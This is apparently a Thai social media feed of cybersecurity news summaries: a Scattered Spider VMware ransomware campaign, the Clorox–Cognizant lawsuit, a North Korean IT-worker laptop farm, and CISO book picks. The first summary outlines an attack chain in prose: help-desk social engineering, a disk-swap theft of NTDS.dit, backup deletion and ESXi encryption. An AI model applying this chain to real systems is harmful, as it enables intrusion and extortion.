    ก่อนจะปล่อยแรนซัมแวร์ พวกเขายังลบงานสำรองข้อมูลและ snapshot ทั้งหมด เพื่อให้เหยื่อไม่มีทางกู้คืนได้ และสุดท้ายก็เข้ารหัสไฟล์ VM ทั้งหมดจากระดับ hypervisor โดยใช้สิทธิ์ root ผ่าน SSH

    Scattered Spider (UNC3944) ใช้ social engineering เพื่อยึดระบบ VMware vSphere
    เริ่มจากโทรหา Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี AD
    ใช้ข้อมูลจากการเจาะระบบภายในเพื่อยกระดับสิทธิ์

    กลุ่มนี้ใช้เครื่องมือถูกกฎหมาย เช่น Teleport เพื่อสร้างช่องทางควบคุมแบบเข้ารหัส
    ติดตั้งบน VCSA เพื่อหลบเลี่ยงการตรวจจับจาก firewall และ EDR
    สร้างช่องทางควบคุมระยะไกลแบบถาวร

    เทคนิค “disk-swap” ใช้ในการขโมยฐานข้อมูล Active Directory โดยไม่ถูกตรวจจับ
    ปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุม
    ขโมยไฟล์ NTDS.dit โดยไม่ผ่านระบบปฏิบัติการของ VM

    ก่อนปล่อยแรนซัมแวร์ กลุ่มนี้จะลบงานสำรองข้อมูลทั้งหมด
    ลบ backup jobs และ repositories เพื่อป้องกันการกู้คืน
    ใช้ SSH บน ESXi hosts เพื่อเข้ารหัสไฟล์ VM โดยตรง

    Google แนะนำให้เปลี่ยนแนวทางป้องกันจาก EDR เป็น “infrastructure-centric defense”
    เน้นการตรวจสอบระดับ hypervisor และการควบคุมสิทธิ์
    ใช้ MFA ที่ต้าน phishing, แยกโครงสร้างสำรองข้อมูล, และตรวจสอบ log อย่างต่อเนื่อง

    การโจมตีแบบนี้สามารถเกิดขึ้นได้ภายในเวลาไม่กี่ชั่วโมง
    จากการโทรครั้งแรกถึงการเข้ารหัสข้อมูลใช้เวลาเพียงไม่กี่ชั่วโมง
    ทำให้ระบบตรวจจับแบบเดิมไม่ทันต่อเหตุการณ์

    ระบบ VMware ESXi และ VCSA มีช่องว่างด้านการตรวจสอบที่ EDR มองไม่เห็น
    ไม่มี agent รันใน hypervisor ทำให้การโจมตีไม่ถูกตรวจจับ
    ต้องใช้การตรวจสอบ log จากระดับระบบเสมือนโดยตรง

    การใช้ Active Directory ร่วมกับ vSphere เป็นจุดอ่อนสำคัญ
    เมื่อ AD ถูกยึด สิทธิ์ใน vSphere ก็ถูกยึดตามไปด้วย
    ควรแยกโครงสร้างสิทธิ์และใช้ MFA ที่ไม่พึ่ง AD

    Help Desk กลายเป็นจุดเริ่มต้นของการโจมตี
    การรีเซ็ตรหัสผ่านผ่านโทรศัพท์เป็นช่องทางที่ถูกใช้บ่อย
    ควรมีขั้นตอนตรวจสอบตัวตนที่เข้มงวดและห้ามรีเซ็ตบัญชีระดับสูงผ่านโทรศัพท์

    https://hackread.com/scattered-spider-ransomware-hijack-vmware-systems-google/
    🕷️ เรื่องเล่าจากเงามืด: เมื่อ Scattered Spider ใช้โทรศัพท์แทนมัลแวร์เพื่อยึดระบบเสมือน Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงจากการโจมตีองค์กรใหญ่ เช่น MGM Resorts และ Harrods โดยใช้เทคนิคที่ไม่ต้องพึ่งช่องโหว่ซอฟต์แวร์ แต่ใช้ “social engineering” ผ่านการโทรศัพท์ไปยัง Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี Active Directory เมื่อได้สิทธิ์เข้าระบบแล้ว พวกเขาจะค้นหาข้อมูลภายใน เช่น รายชื่อผู้ดูแลระบบ vSphere และกลุ่มสิทธิ์ระดับสูง แล้วโทรอีกครั้งเพื่อขอรีเซ็ตรหัสของผู้ดูแลระบบ จากนั้นใช้สิทธิ์ที่ได้เข้าไปยึด VMware vCenter Server Appliance (VCSA) และเปิดช่องทาง SSH บน ESXi hypervisor เพื่อควบคุมระบบทั้งหมด พวกเขายังใช้เครื่องมือถูกกฎหมายอย่าง Teleport เพื่อสร้างช่องทางสื่อสารแบบเข้ารหัสที่หลบเลี่ยงไฟร์วอลล์ และทำการโจมตีแบบ “disk-swap” โดยปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุมเอง เพื่อขโมยฐานข้อมูล NTDS.dit ของ Active Directory ก่อนจะปล่อยแรนซัมแวร์ พวกเขายังลบงานสำรองข้อมูลและ snapshot ทั้งหมด เพื่อให้เหยื่อไม่มีทางกู้คืนได้ และสุดท้ายก็เข้ารหัสไฟล์ VM ทั้งหมดจากระดับ hypervisor โดยใช้สิทธิ์ root ผ่าน SSH ✅ Scattered Spider (UNC3944) ใช้ social engineering เพื่อยึดระบบ VMware vSphere ➡️ เริ่มจากโทรหา Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี AD ➡️ ใช้ข้อมูลจากการเจาะระบบภายในเพื่อยกระดับสิทธิ์ ✅ กลุ่มนี้ใช้เครื่องมือถูกกฎหมาย เช่น Teleport เพื่อสร้างช่องทางควบคุมแบบเข้ารหัส ➡️ ติดตั้งบน VCSA เพื่อหลบเลี่ยงการตรวจจับจาก firewall และ EDR ➡️ สร้างช่องทางควบคุมระยะไกลแบบถาวร ✅ เทคนิค “disk-swap” ใช้ในการขโมยฐานข้อมูล Active Directory โดยไม่ถูกตรวจจับ ➡️ ปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุม ➡️ ขโมยไฟล์ NTDS.dit โดยไม่ผ่านระบบปฏิบัติการของ VM ✅ ก่อนปล่อยแรนซัมแวร์ กลุ่มนี้จะลบงานสำรองข้อมูลทั้งหมด ➡️ ลบ backup jobs และ repositories เพื่อป้องกันการกู้คืน ➡️ ใช้ SSH บน ESXi hosts เพื่อเข้ารหัสไฟล์ VM โดยตรง ✅ Google แนะนำให้เปลี่ยนแนวทางป้องกันจาก EDR เป็น “infrastructure-centric defense” ➡️ เน้นการตรวจสอบระดับ hypervisor และการควบคุมสิทธิ์ ➡️ ใช้ MFA ที่ต้าน phishing, แยกโครงสร้างสำรองข้อมูล, และตรวจสอบ log อย่างต่อเนื่อง ‼️ การโจมตีแบบนี้สามารถเกิดขึ้นได้ภายในเวลาไม่กี่ชั่วโมง ⛔ จากการโทรครั้งแรกถึงการเข้ารหัสข้อมูลใช้เวลาเพียงไม่กี่ชั่วโมง ⛔ ทำให้ระบบตรวจจับแบบเดิมไม่ทันต่อเหตุการณ์ ‼️ ระบบ VMware ESXi และ VCSA มีช่องว่างด้านการตรวจสอบที่ EDR มองไม่เห็น ⛔ ไม่มี agent รันใน hypervisor ทำให้การโจมตีไม่ถูกตรวจจับ ⛔ ต้องใช้การตรวจสอบ log จากระดับระบบเสมือนโดยตรง ‼️ การใช้ Active Directory ร่วมกับ vSphere เป็นจุดอ่อนสำคัญ ⛔ เมื่อ AD ถูกยึด สิทธิ์ใน vSphere ก็ถูกยึดตามไปด้วย ⛔ ควรแยกโครงสร้างสิทธิ์และใช้ MFA ที่ไม่พึ่ง AD ‼️ Help Desk กลายเป็นจุดเริ่มต้นของการโจมตี ⛔ การรีเซ็ตรหัสผ่านผ่านโทรศัพท์เป็นช่องทางที่ถูกใช้บ่อย ⛔ ควรมีขั้นตอนตรวจสอบตัวตนที่เข้มงวดและห้ามรีเซ็ตบัญชีระดับสูงผ่านโทรศัพท์ https://hackread.com/scattered-spider-ransomware-hijack-vmware-systems-google/
    HACKREAD.COM
    Scattered Spider Launching Ransomware on Hijacked VMware Systems, Google
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 223 มุมมอง 0 รีวิว
  • เรื่องเล่าจากสายโทรศัพท์: เมื่อแฮกเกอร์แค่ “ขอรหัส” แล้วได้จริง

    ย้อนกลับไปในเดือนสิงหาคม 2023 บริษัท Clorox ผู้ผลิตน้ำยาฟอกขาวชื่อดัง ถูกโจมตีด้วยแรนซัมแวร์โดยกลุ่ม Scattered Spider ซึ่งใช้วิธีง่ายๆ อย่างการโทรไปยังฝ่าย IT ของ Cognizant—ผู้ให้บริการด้านเทคโนโลยีของ Clorox—แล้ว “ขอรหัสผ่าน” โดยแอบอ้างว่าเป็นพนักงาน

    สิ่งที่น่าตกใจคือ พนักงานของ Cognizant กลับให้รหัสผ่านโดยไม่ตรวจสอบตัวตนใดๆ ทั้งสิ้น! ไม่ถามชื่อผู้จัดการ ไม่ตรวจสอบอีเมล ไม่ใช้ระบบยืนยันตัวตนที่ Clorox เตรียมไว้เลยแม้แต่นิดเดียว

    ผลลัพธ์คือ Clorox ต้องหยุดการผลิต, ปิดระบบ IT, และใช้การจัดการคำสั่งซื้อแบบแมนนวลนานหลายสัปดาห์ รวมความเสียหายกว่า 380 ล้านดอลลาร์ และล่าสุด Clorox ได้ฟ้อง Cognizant ฐานประมาทเลินเล่ออย่างร้ายแรง

    Clorox ถูกโจมตีด้วยแรนซัมแวร์ในเดือนสิงหาคม 2023 โดยกลุ่ม Scattered Spider
    ใช้วิธี social engineering โทรไปขอรหัสผ่านจากฝ่าย IT โดยแอบอ้างเป็นพนักงาน
    ไม่ใช้มัลแวร์หรือเทคนิคซับซ้อนใดๆ

    Cognizant เป็นผู้ให้บริการ IT ที่ดูแลระบบภายในของ Clorox รวมถึงการรีเซ็ตรหัสผ่านและ MFA
    มีหน้าที่ตรวจสอบตัวตนก่อนให้ข้อมูลสำคัญ
    แต่กลับละเลยขั้นตอนทั้งหมดที่ Clorox กำหนดไว้

    Clorox ฟ้อง Cognizant เรียกค่าเสียหาย 380 ล้านดอลลาร์
    รวมถึงค่าใช้จ่ายในการฟื้นฟูระบบกว่า 49 ล้านดอลลาร์
    และความเสียหายจากการหยุดผลิตและจัดส่งสินค้า

    มีหลักฐานเป็นบทสนทนาระหว่างแฮกเกอร์กับพนักงาน Cognizant ที่ให้รหัสโดยไม่ตรวจสอบ
    “I don’t have a password, so I can’t connect.”
    “Oh, ok. Ok. So, let me provide the password to you, okay?”

    ระบบที่ควรใช้คือ MyID และการตรวจสอบผ่านชื่อผู้จัดการและอีเมลยืนยัน
    แต่ไม่ได้ถูกนำมาใช้เลยในเหตุการณ์นี้
    แสดงถึงความล้มเหลวในการฝึกอบรมและควบคุมคุณภาพ

    การละเลยขั้นตอนตรวจสอบตัวตนสามารถเปิดช่องให้เกิดการโจมตีร้ายแรง
    แม้จะมีระบบความปลอดภัยดีแค่ไหน แต่จุดอ่อนคือ “มนุษย์” ที่ไม่ทำตามขั้นตอน
    การแอบอ้างตัวตนเป็นวิธีพื้นฐานที่ยังได้ผลในหลายองค์กร

    การจ้างบริษัทภายนอกดูแลระบบ IT ต้องมีการกำกับและตรวจสอบอย่างเข้มงวด
    ไม่ควรคิดว่า “จ้างแล้วจบ” โดยไม่ติดตามการปฏิบัติงานจริง
    ควรมีสัญญาที่ระบุขั้นตอนความปลอดภัยอย่างชัดเจน

    การตอบสนองต่อเหตุการณ์โจมตีต้องรวดเร็วและแม่นยำ
    Clorox ระบุว่า Cognizantใช้เวลานานเกินไปในการติดตั้งเครื่องมือป้องกัน
    ส่งผลให้การควบคุมความเสียหายล่าช้าไปหลายชั่วโมง

    การละเมิดขั้นตอนพื้นฐานอาจนำไปสู่ความเสียหายระดับองค์กร
    ไม่ใช่แค่ข้อมูลรั่ว แต่กระทบถึงการผลิต, การจัดส่ง, และความเชื่อมั่นของลูกค้า
    อาจต้องใช้เวลาหลายเดือนในการฟื้นฟูภาพลักษณ์และระบบ

    https://www.tomshardware.com/tech-industry/cyber-security/it-provider-sued-after-it-simply-handed-the-credentials-to-hackers-clorox-claims-cognizant-gaffe-enabled-a-usd380m-ransomware-attack
    🔓 เรื่องเล่าจากสายโทรศัพท์: เมื่อแฮกเกอร์แค่ “ขอรหัส” แล้วได้จริง ย้อนกลับไปในเดือนสิงหาคม 2023 บริษัท Clorox ผู้ผลิตน้ำยาฟอกขาวชื่อดัง ถูกโจมตีด้วยแรนซัมแวร์โดยกลุ่ม Scattered Spider ซึ่งใช้วิธีง่ายๆ อย่างการโทรไปยังฝ่าย IT ของ Cognizant—ผู้ให้บริการด้านเทคโนโลยีของ Clorox—แล้ว “ขอรหัสผ่าน” โดยแอบอ้างว่าเป็นพนักงาน สิ่งที่น่าตกใจคือ พนักงานของ Cognizant กลับให้รหัสผ่านโดยไม่ตรวจสอบตัวตนใดๆ ทั้งสิ้น! ไม่ถามชื่อผู้จัดการ ไม่ตรวจสอบอีเมล ไม่ใช้ระบบยืนยันตัวตนที่ Clorox เตรียมไว้เลยแม้แต่นิดเดียว ผลลัพธ์คือ Clorox ต้องหยุดการผลิต, ปิดระบบ IT, และใช้การจัดการคำสั่งซื้อแบบแมนนวลนานหลายสัปดาห์ รวมความเสียหายกว่า 380 ล้านดอลลาร์ และล่าสุด Clorox ได้ฟ้อง Cognizant ฐานประมาทเลินเล่ออย่างร้ายแรง ✅ Clorox ถูกโจมตีด้วยแรนซัมแวร์ในเดือนสิงหาคม 2023 โดยกลุ่ม Scattered Spider ➡️ ใช้วิธี social engineering โทรไปขอรหัสผ่านจากฝ่าย IT โดยแอบอ้างเป็นพนักงาน ➡️ ไม่ใช้มัลแวร์หรือเทคนิคซับซ้อนใดๆ ✅ Cognizant เป็นผู้ให้บริการ IT ที่ดูแลระบบภายในของ Clorox รวมถึงการรีเซ็ตรหัสผ่านและ MFA ➡️ มีหน้าที่ตรวจสอบตัวตนก่อนให้ข้อมูลสำคัญ ➡️ แต่กลับละเลยขั้นตอนทั้งหมดที่ Clorox กำหนดไว้ ✅ Clorox ฟ้อง Cognizant เรียกค่าเสียหาย 380 ล้านดอลลาร์ ➡️ รวมถึงค่าใช้จ่ายในการฟื้นฟูระบบกว่า 49 ล้านดอลลาร์ ➡️ และความเสียหายจากการหยุดผลิตและจัดส่งสินค้า ✅ มีหลักฐานเป็นบทสนทนาระหว่างแฮกเกอร์กับพนักงาน Cognizant ที่ให้รหัสโดยไม่ตรวจสอบ ➡️ “I don’t have a password, so I can’t connect.” ➡️ “Oh, ok. Ok. So, let me provide the password to you, okay?” ✅ ระบบที่ควรใช้คือ MyID และการตรวจสอบผ่านชื่อผู้จัดการและอีเมลยืนยัน ➡️ แต่ไม่ได้ถูกนำมาใช้เลยในเหตุการณ์นี้ ➡️ แสดงถึงความล้มเหลวในการฝึกอบรมและควบคุมคุณภาพ ‼️ การละเลยขั้นตอนตรวจสอบตัวตนสามารถเปิดช่องให้เกิดการโจมตีร้ายแรง ⛔ แม้จะมีระบบความปลอดภัยดีแค่ไหน แต่จุดอ่อนคือ “มนุษย์” ที่ไม่ทำตามขั้นตอน ⛔ การแอบอ้างตัวตนเป็นวิธีพื้นฐานที่ยังได้ผลในหลายองค์กร ‼️ การจ้างบริษัทภายนอกดูแลระบบ IT ต้องมีการกำกับและตรวจสอบอย่างเข้มงวด ⛔ ไม่ควรคิดว่า “จ้างแล้วจบ” โดยไม่ติดตามการปฏิบัติงานจริง ⛔ ควรมีสัญญาที่ระบุขั้นตอนความปลอดภัยอย่างชัดเจน ‼️ การตอบสนองต่อเหตุการณ์โจมตีต้องรวดเร็วและแม่นยำ ⛔ Clorox ระบุว่า Cognizantใช้เวลานานเกินไปในการติดตั้งเครื่องมือป้องกัน ⛔ ส่งผลให้การควบคุมความเสียหายล่าช้าไปหลายชั่วโมง ‼️ การละเมิดขั้นตอนพื้นฐานอาจนำไปสู่ความเสียหายระดับองค์กร ⛔ ไม่ใช่แค่ข้อมูลรั่ว แต่กระทบถึงการผลิต, การจัดส่ง, และความเชื่อมั่นของลูกค้า ⛔ อาจต้องใช้เวลาหลายเดือนในการฟื้นฟูภาพลักษณ์และระบบ https://www.tomshardware.com/tech-industry/cyber-security/it-provider-sued-after-it-simply-handed-the-credentials-to-hackers-clorox-claims-cognizant-gaffe-enabled-a-usd380m-ransomware-attack
    0 ความคิดเห็น 0 การแบ่งปัน 240 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: เมื่อ “งานไอที” กลายเป็นช่องทางส่งเงินให้โครงการนิวเคลียร์เกาหลีเหนือ

    ลองจินตนาการว่าคุณเป็นบริษัทเทคโนโลยีในสหรัฐฯ ที่จ้างพนักงานไอทีทำงานจากระยะไกล โดยเชื่อว่าเขาเป็นพลเมืองอเมริกัน แต่จริงๆ แล้ว เขาคือเจ้าหน้าที่จากเกาหลีเหนือที่ใช้ตัวตนปลอม และเงินเดือนที่คุณจ่ายไปนั้นถูกส่งตรงไปยังรัฐบาลเปียงยางเพื่อใช้ในโครงการอาวุธนิวเคลียร์!

    นี่คือสิ่งที่เกิดขึ้นจริงในคดีของ Christina Marie Chapman หญิงวัย 50 ปีจากรัฐแอริโซนา ที่ถูกตัดสินจำคุก 8.5 ปีในเดือนกรกฎาคม 2025 จากการช่วยเหลือเจ้าหน้าที่ไอทีของเกาหลีเหนือให้ได้งานในบริษัทสหรัฐฯ กว่า 309 แห่ง รวมถึงบริษัทระดับ Fortune 500 โดยใช้เทคนิคที่เรียกว่า “ฟาร์มแล็ปท็อป” เพื่อหลอกให้บริษัทเชื่อว่าพนักงานเหล่านั้นทำงานจากในประเทศ

    Christina Chapman ถูกตัดสินจำคุก 102 เดือน ฐานช่วยเหลือขบวนการหลอกลวงงานไอทีให้เกาหลีเหนือ
    รับโทษจำคุก 8.5 ปี พร้อมถูกควบคุมหลังพ้นโทษอีก 3 ปี
    ต้องยึดทรัพย์ $284,555.92 และจ่ายค่าปรับ $176,850

    ขบวนการนี้สร้างรายได้ให้เกาหลีเหนือกว่า $17.1 ล้าน
    ใช้ตัวตนปลอมของชาวอเมริกัน 68 คน
    ส่งข้อมูลเท็จไปยังหน่วยงานรัฐกว่า 100 ครั้ง

    Chapman ดำเนินการ “ฟาร์มแล็ปท็อป” ที่บ้านของเธอ
    รับเครื่องจากบริษัทสหรัฐฯ แล้วให้เจ้าหน้าที่เกาหลีเหนือเข้าระบบจากต่างประเทศ
    ส่งแล็ปท็อป 49 เครื่องไปยังเมืองชายแดนจีน-เกาหลีเหนือ

    บริษัทที่ถูกหลอกรวมถึงเครือข่ายโทรทัศน์รายใหญ่, บริษัทเทคโนโลยีใน Silicon Valley, ผู้ผลิตรถยนต์และอากาศยาน
    มีความพยายามเข้าถึงหน่วยงานรัฐบาลสหรัฐฯ 2 แห่ง แต่ถูกสกัดไว้ได้
    บางบริษัทถูกขบวนการนี้ “เลือกเป้าหมาย” โดยเฉพาะ

    รายได้จากงานไอทีถูกส่งกลับไปยังเกาหลีเหนือผ่านการฟอกเงิน
    Chapman รับเงินเดือนแทน, ปลอมลายเซ็น, ฝากเช็ค และโอนเงินไปต่างประเทศ
    รายได้ถูกแจ้งเท็จต่อ IRS และ Social Security

    FBI และ IRS เป็นผู้สืบสวนหลักในคดีนี้
    ยึดแล็ปท็อปกว่า 90 เครื่องจากบ้านของ Chapman
    ถือเป็นหนึ่งในคดีใหญ่ที่สุดที่เกี่ยวข้องกับการหลอกลวงงานไอทีของเกาหลีเหนือ

    รัฐบาลสหรัฐฯ ออกคำแนะนำใหม่สำหรับบริษัทในการตรวจสอบพนักงานระยะไกล
    ตรวจสอบเอกสารตัวตน, ประวัติการศึกษาและการทำงาน
    ใช้วิดีโอสัมภาษณ์แบบเปิดกล้องและตรวจสอบภาพพื้นหลัง

    บริษัทที่ไม่ตรวจสอบพนักงานระยะไกลอย่างเข้มงวดเสี่ยงต่อการถูกแทรกซึม
    อาจถูกขโมยข้อมูล, ติดมัลแวร์ หรือถูกใช้เป็นช่องทางฟอกเงิน
    การใช้บริษัทจัดหางานภายนอกเพิ่มความเสี่ยง

    การใช้ตัวตนปลอมสร้างภาระให้กับพลเมืองสหรัฐฯ ที่ถูกขโมยข้อมูล
    เกิดภาระภาษีเท็จและข้อมูลผิดพลาดในระบบราชการ
    สร้างความเสียหายทางจิตใจและการเงินแก่ผู้ถูกแอบอ้าง

    รายได้จากงานไอทีถูกนำไปใช้สนับสนุนโครงการอาวุธของเกาหลีเหนือ
    เป็นการละเมิดมาตรการคว่ำบาตรของสหรัฐฯ และสหประชาชาติ
    ส่งผลต่อความมั่นคงระดับโลก

    การใช้ AI และเทคโนโลยีใหม่เพิ่มความซับซ้อนในการปลอมตัว
    มีการใช้ AI เปลี่ยนภาพเอกสาร, ปรับเสียง และสร้างวิดีโอปลอม
    ทำให้การตรวจสอบตัวตนยากขึ้นสำหรับบริษัททั่วไป

    https://hackread.com/arizona-woman-jailed-help-north-korea-it-job-scam/
    🧑‍💻 เรื่องเล่าจากโลกไซเบอร์: เมื่อ “งานไอที” กลายเป็นช่องทางส่งเงินให้โครงการนิวเคลียร์เกาหลีเหนือ ลองจินตนาการว่าคุณเป็นบริษัทเทคโนโลยีในสหรัฐฯ ที่จ้างพนักงานไอทีทำงานจากระยะไกล โดยเชื่อว่าเขาเป็นพลเมืองอเมริกัน แต่จริงๆ แล้ว เขาคือเจ้าหน้าที่จากเกาหลีเหนือที่ใช้ตัวตนปลอม และเงินเดือนที่คุณจ่ายไปนั้นถูกส่งตรงไปยังรัฐบาลเปียงยางเพื่อใช้ในโครงการอาวุธนิวเคลียร์! นี่คือสิ่งที่เกิดขึ้นจริงในคดีของ Christina Marie Chapman หญิงวัย 50 ปีจากรัฐแอริโซนา ที่ถูกตัดสินจำคุก 8.5 ปีในเดือนกรกฎาคม 2025 จากการช่วยเหลือเจ้าหน้าที่ไอทีของเกาหลีเหนือให้ได้งานในบริษัทสหรัฐฯ กว่า 309 แห่ง รวมถึงบริษัทระดับ Fortune 500 โดยใช้เทคนิคที่เรียกว่า “ฟาร์มแล็ปท็อป” เพื่อหลอกให้บริษัทเชื่อว่าพนักงานเหล่านั้นทำงานจากในประเทศ ✅ Christina Chapman ถูกตัดสินจำคุก 102 เดือน ฐานช่วยเหลือขบวนการหลอกลวงงานไอทีให้เกาหลีเหนือ ➡️ รับโทษจำคุก 8.5 ปี พร้อมถูกควบคุมหลังพ้นโทษอีก 3 ปี ➡️ ต้องยึดทรัพย์ $284,555.92 และจ่ายค่าปรับ $176,850 ✅ ขบวนการนี้สร้างรายได้ให้เกาหลีเหนือกว่า $17.1 ล้าน ➡️ ใช้ตัวตนปลอมของชาวอเมริกัน 68 คน ➡️ ส่งข้อมูลเท็จไปยังหน่วยงานรัฐกว่า 100 ครั้ง ✅ Chapman ดำเนินการ “ฟาร์มแล็ปท็อป” ที่บ้านของเธอ ➡️ รับเครื่องจากบริษัทสหรัฐฯ แล้วให้เจ้าหน้าที่เกาหลีเหนือเข้าระบบจากต่างประเทศ ➡️ ส่งแล็ปท็อป 49 เครื่องไปยังเมืองชายแดนจีน-เกาหลีเหนือ ✅ บริษัทที่ถูกหลอกรวมถึงเครือข่ายโทรทัศน์รายใหญ่, บริษัทเทคโนโลยีใน Silicon Valley, ผู้ผลิตรถยนต์และอากาศยาน ➡️ มีความพยายามเข้าถึงหน่วยงานรัฐบาลสหรัฐฯ 2 แห่ง แต่ถูกสกัดไว้ได้ ➡️ บางบริษัทถูกขบวนการนี้ “เลือกเป้าหมาย” โดยเฉพาะ ✅ รายได้จากงานไอทีถูกส่งกลับไปยังเกาหลีเหนือผ่านการฟอกเงิน ➡️ Chapman รับเงินเดือนแทน, ปลอมลายเซ็น, ฝากเช็ค และโอนเงินไปต่างประเทศ ➡️ รายได้ถูกแจ้งเท็จต่อ IRS และ Social Security ✅ FBI และ IRS เป็นผู้สืบสวนหลักในคดีนี้ ➡️ ยึดแล็ปท็อปกว่า 90 เครื่องจากบ้านของ Chapman ➡️ ถือเป็นหนึ่งในคดีใหญ่ที่สุดที่เกี่ยวข้องกับการหลอกลวงงานไอทีของเกาหลีเหนือ ✅ รัฐบาลสหรัฐฯ ออกคำแนะนำใหม่สำหรับบริษัทในการตรวจสอบพนักงานระยะไกล ➡️ ตรวจสอบเอกสารตัวตน, ประวัติการศึกษาและการทำงาน ➡️ ใช้วิดีโอสัมภาษณ์แบบเปิดกล้องและตรวจสอบภาพพื้นหลัง ‼️ บริษัทที่ไม่ตรวจสอบพนักงานระยะไกลอย่างเข้มงวดเสี่ยงต่อการถูกแทรกซึม ⛔ อาจถูกขโมยข้อมูล, ติดมัลแวร์ หรือถูกใช้เป็นช่องทางฟอกเงิน ⛔ การใช้บริษัทจัดหางานภายนอกเพิ่มความเสี่ยง ‼️ การใช้ตัวตนปลอมสร้างภาระให้กับพลเมืองสหรัฐฯ ที่ถูกขโมยข้อมูล ⛔ เกิดภาระภาษีเท็จและข้อมูลผิดพลาดในระบบราชการ ⛔ สร้างความเสียหายทางจิตใจและการเงินแก่ผู้ถูกแอบอ้าง ‼️ รายได้จากงานไอทีถูกนำไปใช้สนับสนุนโครงการอาวุธของเกาหลีเหนือ ⛔ เป็นการละเมิดมาตรการคว่ำบาตรของสหรัฐฯ และสหประชาชาติ ⛔ ส่งผลต่อความมั่นคงระดับโลก ‼️ การใช้ AI และเทคโนโลยีใหม่เพิ่มความซับซ้อนในการปลอมตัว ⛔ มีการใช้ AI เปลี่ยนภาพเอกสาร, ปรับเสียง และสร้างวิดีโอปลอม ⛔ ทำให้การตรวจสอบตัวตนยากขึ้นสำหรับบริษัททั่วไป https://hackread.com/arizona-woman-jailed-help-north-korea-it-job-scam/
    HACKREAD.COM
    Arizona Woman Jailed for Helping North Korea in $17M IT Job Scam
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 296 มุมมอง 0 รีวิว
  • เรื่องเล่าจากโลกไซเบอร์: หนังสือที่เปลี่ยนผู้นำให้กลายเป็นนักคิดเชิงกลยุทธ์

    ลองนึกภาพว่าคุณเป็น CISO (Chief Information Security Officer) ที่ต้องรับมือกับภัยคุกคามไซเบอร์ตลอดเวลา ทั้งการโจมตีแบบใหม่ ความเสี่ยงจากพฤติกรรมมนุษย์ และแรงกดดันจากผู้บริหารระดับสูง คุณจะพึ่งพาอะไรเพื่อพัฒนาทักษะการตัดสินใจและความเป็นผู้นำ?

    คำตอบของผู้นำหลายคนคือ “หนังสือ” — ไม่ใช่แค่คู่มือเทคนิค แต่เป็นแหล่งความรู้ที่ช่วยให้พวกเขาเข้าใจความเสี่ยง มนุษย์ และตัวเองได้ลึกซึ้งขึ้น

    จากการสำรวจของ CSO Online พบว่า CISO ชั้นนำแนะนำหนังสือหลากหลายแนว ตั้งแต่จิตวิทยาการตัดสินใจอย่าง Thinking, Fast and Slow ไปจนถึงการวัดความเสี่ยงแบบใหม่ใน How to Measure Anything in Cybersecurity Risk และแม้แต่หนังสืออย่าง The Art of Deception ที่เผยกลยุทธ์ของแฮกเกอร์ในการหลอกล่อมนุษย์

    สิ่งที่น่าสนใจคือ หลายคนยังแนะนำหนังสือที่ไม่เกี่ยวกับไซเบอร์โดยตรง เช่น The Alchemist หรือ Our Town เพื่อเตือนตัวเองให้กลับมาโฟกัสกับชีวิตและความหมายที่แท้จริง

    หนังสือที่ช่วยพัฒนาทักษะการวัดและจัดการความเสี่ยง

    How to Measure Anything in Cybersecurity Risk โดย Douglas Hubbard & Richard Seiersen
    เสนอวิธีวัดความเสี่ยงแบบกึ่งปริมาณที่แม่นยำกว่าการใช้ risk matrix
    ได้รับการแนะนำจากหลาย CISO เช่น Daniel Schatz และ James Blake

    Superforecasting โดย Philip Tetlock & Dan Gardner
    เจาะลึกศาสตร์แห่งการพยากรณ์อนาคตอย่างมีหลักการ
    มีตัวอย่างจริงและแนวทางสร้างการคาดการณ์ที่แม่นยำ

    หนังสือที่ช่วยลด “เสียงรบกวน” ในการตัดสินใจ

    Thinking, Fast and Slow โดย Daniel Kahneman
    อธิบายระบบคิดแบบเร็ว (System 1) และช้า (System 2)
    ช่วยให้เข้าใจอคติและข้อผิดพลาดในการตัดสินใจ

    Noise โดย Kahneman และทีม
    วิเคราะห์ว่าทำไมมนุษย์ถึงตัดสินใจผิดเพราะ “เสียงรบกวน”
    เสนอวิธีลดความผิดพลาดในการประเมินสถานการณ์

    Yeah, But โดย Marc Wolfe
    ช่วยให้ผู้นำจัดการกับเสียงในหัวที่ขัดขวางการเปลี่ยนแปลง
    ส่งเสริมความชัดเจนในการคิดและการนำทีม

    Digital Minimalism โดย Cal Newport
    ส่งเสริมการใช้เทคโนโลยีอย่างมีสติ
    ช่วยปกป้องเวลาและความสนใจของผู้นำ

    Better Than Before โดย Gretchen Rubin
    เสนอกรอบการสร้างนิสัยที่ดีเพื่อสนับสนุนเป้าหมายชีวิตและงาน

    หนังสือที่เน้นความเสี่ยงจากพฤติกรรมมนุษย์

    The Art of Deception โดย Kevin Mitnick
    เผยกลยุทธ์ social engineering ที่แฮกเกอร์ใช้หลอกมนุษย์
    ยังคงเป็นหนังสือพื้นฐานที่มีคุณค่าแม้จะตีพิมพ์มานาน

    Secrets and Lies โดย Bruce Schneier
    อธิบายความซับซ้อนของความปลอดภัยดิจิทัล
    เน้นว่าการจัดการพฤติกรรมมนุษย์สำคัญไม่แพ้เทคโนโลยี

    Human Hacked โดย Len Noe
    เจาะลึกผลกระทบของ AI ต่อการตัดสินใจของมนุษย์
    เตือนถึงผลลัพธ์ที่ไม่คาดคิดจากการผสานมนุษย์กับเทคโนโลยี

    ความเสี่ยงจากการละเลยพฤติกรรมมนุษย์ในระบบความปลอดภัย
    องค์กรที่เน้นเทคโนโลยีอย่างเดียวอาจพลาดช่องโหว่จากมนุษย์
    การไม่เข้าใจ social engineering ทำให้ระบบถูกเจาะง่ายขึ้น

    หนังสือที่ช่วยพัฒนาภาวะผู้นำ

    Dare to Lead โดย Brené Brown
    เน้นความกล้าหาญทางอารมณ์และความยืดหยุ่น
